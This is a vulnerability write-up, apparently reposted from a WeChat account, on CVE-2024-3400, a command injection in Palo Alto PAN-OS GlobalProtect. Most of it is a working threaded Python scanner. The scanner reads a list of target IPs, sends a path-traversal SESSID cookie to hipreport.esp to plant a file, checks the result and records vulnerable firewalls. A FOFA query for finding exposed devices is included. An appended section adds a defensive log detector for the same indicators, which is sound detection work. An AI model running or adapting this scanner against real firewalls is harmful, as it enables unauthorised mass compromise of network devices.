CVE-2024-3400

admin, 19 April 2024, 02:36:09

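Vulnerability description

A command injection vulnerability exists in the GlobalProtect feature of Palo Alto Networks PAN-OS software. It affects PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewalls that have a GlobalProtect gateway and device telemetry configured. An unauthenticated attacker can exploit it to execute arbitrary code on the firewall with root privileges.

Asset mapping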

FOFA:app="paloalto-GlobalProtect"

Vulnerability reproduction

import random
import string
from concurrent.futures import ThreadPoolExecutor
import urllib3
import requests

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
resFile = open("resFile.txt", "w")

def GenerateRandomString(length):
    characters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(characters) for _ in range(length))

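def CheckFile(url, proxy, filename):
    # Compare the marker file name with a control name that was never created:
    # 403 for the marker and 404 for the control is treated as proof the file exists.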
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    }
    resp1 = requests.get(url=url + f"/global-protect/portal/images/{filename}.txt", headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
    resp2 = requests.get(url=url + f"/global-protect/portal/images/{filename}_cve_test.txt", headers=headers, proxies=proxy,
                         verify=False, allow_redirects=False, timeout=10)
    if resp1.status_code == 403 and resp2.status_code == 404:
        return True
    else:
        return False

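def CreateFile(url, proxy):
    # POST to hipreport.esp with a SESSID cookie that is a traversal path into the
    # portal images directory, then check whether a file with that name appeared.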
    filename = GenerateRandomString(10)
    headers = {
        "Cookie": f"SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{filename}.txt;",
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    }
    resp = requests.post(url=url + "/ssl-vpn/hipreport.esp", headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
    if resp.status_code == 200:
        if CheckFile(url, proxy, filename):
            print(f"[+] {url}")
            resFile.write(f"{url}\n")


def GetUrls():
    with open("ip_all.txt","r") as f:
        for address in f.readlines():
            address = address.strip()
            yield address

if __name__ == "__main__":
    # proxy = {
    #     "http": "http://127.0.0.1:8080",
    #     "https": "http://127.0.0.1:8080"
    # }
    proxy = {}
    addrs = GetUrls()
    max_thread_num = 30
    executor = ThreadPoolExecutor(max_workers=max_thread_num)
    for addr in addrs:
        future = executor.submit(CreateFile, addr, proxy)
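
A defender-side complement to the script above, added here and not part of the original post: it scans HTTP request records for the two indicators the script produces, a SESSID cookie carrying a path on POST /ssl-vpn/hipreport.esp and a later 403 for the same file name under /global-protect/portal/images/. The JSON-lines record format, the field names and the sample records are constructed assumptions.

```python
import json
import re
from urllib.parse import unquote

# Constructed sample records; the JSON-lines layout and field names are assumptions.
SAMPLE_LOG = """\
{"src": "198.51.100.7", "method": "POST", "path": "/ssl-vpn/hipreport.esp", "cookie": "SESSID=0f8c2a1e-5b7d-4c3a-9e21-7a6b5c4d3e2f", "status": 200}
{"src": "203.0.113.9", "method": "POST", "path": "/ssl-vpn/hipreport.esp", "cookie": "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/k3x9q0zj1a.txt;", "status": 200}
{"src": "203.0.113.9", "method": "GET", "path": "/global-protect/portal/images/k3x9q0zj1a.txt", "cookie": "", "status": 403}
{"src": "192.0.2.44", "method": "GET", "path": "/global-protect/portal/images/logo.txt", "cookie": "", "status": 403}
"""

SESSID_RE = re.compile(r"(?:^|;\s*)SESSID=([^;]*)")
HIP_PATH = "/ssl-vpn/hipreport.esp"
IMAGES_PREFIX = "/global-protect/portal/images/"

def sessid_of(cookie):
    """Return the percent-decoded SESSID value from a Cookie header, or None."""
    m = SESSID_RE.search(cookie or "")
    # Decode twice so a double-encoded separator is normalised before matching.
    return unquote(unquote(m.group(1))) if m else None

def is_traversal(value):
    """A session identifier has no reason to contain path separators or '..'."""
    return value is not None and ("/" in value or "\\" in value or ".." in value)

def detect(lines):
    """Return (rule, source, detail) tuples for suspicious records, in log order."""
    findings, planted = [], set()
    for line in lines:
        rec = json.loads(line)
        path, sid = rec["path"], sessid_of(rec.get("cookie"))
        if rec["method"] == "POST" and path.startswith(HIP_PATH) and is_traversal(sid):
            findings.append(("traversal_sessid", rec["src"], sid))
            planted.add(sid.replace("\\", "/").rsplit("/", 1)[-1])  # remember the file name
        elif path.startswith(IMAGES_PREFIX) and rec["status"] == 403:
            name = path[len(IMAGES_PREFIX):]
            if name in planted:  # 403 on a name seen in an earlier cookie: file exists
                findings.append(("marker_file_confirmed", rec["src"], name))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG.splitlines()):
        print(finding)
```

A `marker_file_confirmed` finding means the write succeeded on that device, so it should be handled as a compromise indicator rather than a blocked probe.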

Originally published on the WeChat official account 漏洞文库: [Vulnerability reproduction] CVE-2024-3400
